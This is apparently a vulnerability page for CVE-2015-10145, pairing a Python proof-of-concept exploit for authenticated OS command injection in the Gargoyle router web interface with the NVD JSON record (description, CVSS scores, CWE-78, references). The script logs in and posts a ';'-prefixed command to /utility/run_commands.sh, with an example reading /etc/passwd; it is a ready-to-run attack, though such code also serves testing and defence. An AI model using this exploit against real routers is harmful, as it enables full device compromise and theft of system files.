CVE-2015-10145

import requests import sys # CVE-2015-10145 PoC - Gargoyle Router Authenticated Command Execution # Target: Gargoyle Router Management Utility < 1.5.x def exploit(target_url, username, password, command): """ Exploit authenticated command execution in Gargoyle router Args: target_url: Base URL of Gargoyle router web interface username: Valid username for authentication password: Valid password for authentication command: Command to execute on the target system """ session = requests.Session() # Step 1: Authenticate to the Gargoyle web interface login_data = { 'username': username, 'password': password } try: login_url = f"{target_url}/login.cgi" response = session.post(login_url, data=login_data, timeout=10) # Step 2: Inject malicious command via commands parameter exploit_url = f"{target_url}/utility/run_commands.sh" payload = {'commands': f';{command}'} exploit_response = session.post(exploit_url, data=payload, timeout=10) print(f"[*] Command executed successfully") print(f"[*] Output:\n{exploit_response.text}") return True except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <command>") print(f"Example: python {sys.argv[0]} http://192.168.1.1 admin admin 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] exploit(target, user, pwd, cmd)

{"cve": {"id": "CVE-2015-10145", "sourceIdentifier": "[email protected]", "published": "2025-12-31T21:15:50.920", "lastModified": "2026-01-29T16:53:56.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gargoyle router management utility versions 1.5.x contain an authenticated OS command execution vulnerability in /utility/run_commands.sh. The application fails to properly restrict or validate input supplied via the 'commands' parameter, allowing an authenticated attacker to execute arbitrary shell commands on the underlying system. Successful exploitation may result in full compromise of the device, including unauthorized access to system files and execution of attacker-controlled commands."}, {"lang": "es", "value": "Las versiones 1.5.x de la utilidad de gestión de router Gargoyle contienen una vulnerabilidad de ejecución de comandos del sistema operativo autenticada en /utility/run_commands.sh. La aplicación no restringe o valida adecuadamente la entrada suministrada a través del parámetro 'commands', permitiendo a un atacante autenticado ejecutar comandos de shell arbitrarios en el sistema subyacente. La explotación exitosa puede resultar en el compromiso total del dispositivo, incluyendo acceso no autorizado a archivos del sistema y la ejecución de comandos controlados por el atacante."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gargoyle-router:gargoyle:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.5.0", "versionEndIncluding": "1.5.11", "matchCriteriaId": "D73C8A87-4FF9-41D2-864E-71480A9558C5"}]}]}], "references": [{"url": "https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://packetstorm.news/files/id/132149", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.gargoyle-router.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/gargoyle-authenticated-os-command-execution-via-run-commands-sh", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}